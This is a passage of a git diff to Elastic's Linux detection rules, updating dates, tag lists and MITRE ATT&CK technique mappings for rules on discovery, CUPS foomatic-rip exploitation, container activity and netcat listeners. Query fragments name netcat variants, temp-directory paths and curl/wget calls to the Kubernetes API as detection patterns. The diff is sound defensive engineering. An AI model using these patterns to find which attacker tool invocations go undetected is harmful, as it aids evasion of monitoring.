"2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,14 +106,13 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_suid_sguid_enumeration.toml b/rules/linux/discovery_suid_sguid_enumeration.toml index ce279082884..4d18a674e20 100644 --- a/rules/linux/discovery_suid_sguid_enumeration.toml +++ b/rules/linux/discovery_suid_sguid_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,15 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -113,29 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml index e78382373b9..3a9839168b7 100644 --- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml +++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,16 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Command and Control", - "Tactic: Reconnaissance", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,37 +103,24 @@ not (process.name in ("nc.traditional", "nc", "ncat", "netcat") and process.args framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml index 732545b5d3b..5012b1d148f 100644 --- a/rules/linux/discovery_suspicious_which_command_execution.toml +++ b/rules/linux/discovery_suspicious_which_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,13 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml index e855e9a3297..21c52e8d1b2 100644 --- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml +++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,9 +105,24 @@ sequence by host.id, process.parent.entity_id with maxspan=1s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index db90a1ad7af..d333b15eb7c 100644 --- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,17 +104,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -138,9 +128,32 @@ process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml index 2d0397313ad..16b1effaea4 100644 --- a/rules/linux/discovery_yum_dnf_plugin_detection.toml +++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,9 +113,14 @@ not ?process.parent.executable == "/usr/lib/venv-salt-minion/bin/python.original framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index 6310d47ea9b..f73a2c08c13 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,16 +97,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: BPFDoor", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -144,15 +135,19 @@ file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml index ecf13768813..afd71b6364b 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,6 +123,16 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml index e3029462837..7a0b343479e 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,19 +103,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Use Case: Vulnerability", - "Tactic: Execution", - "Data Source: Crowdstrike", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Crowdstrike", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -135,11 +123,29 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml index 9a89825b302..9e4b83c0aab 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -132,14 +132,18 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml index 21393246708..63b6636a9ca 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,18 +103,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Use Case: Vulnerability", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -148,14 +137,31 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like ( [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml index 4f987d0a01c..a1c87d57ec2 100644 --- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml +++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ Containers, often used for deploying applications, start with an entrypoint scri risk_score = 47 rule_id = "c75d0c86-38d6-4821-98a1-465cff8ff4c8" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -86,6 +78,19 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -100,16 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index db15ac7e5ad..e06b6cc1346 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2025/01/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,20 +88,3 @@ In Linux environments, processes with executable stacks can pose security risks - Implement stack protection mechanisms such as stack canaries or non-executable stack configurations to prevent future exploitation. - Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index d2a3a87c967..4b8060d9d8e 100644 --- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,14 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, user.id with maxspan=1m @@ -109,6 +102,37 @@ sequence by host.id, user.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 18431eba5ca..79c6860fe6c 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,19 +92,6 @@ process.args like ("/dev/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 59cdf65a41e..717371ec75b 100644 --- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,18 +116,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -147,6 +136,24 @@ process.args like~ ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -161,3 +168,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 7358ddd13d1..28f2960a711 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 15462abd9f1..228072a8a57 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,22 +91,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ 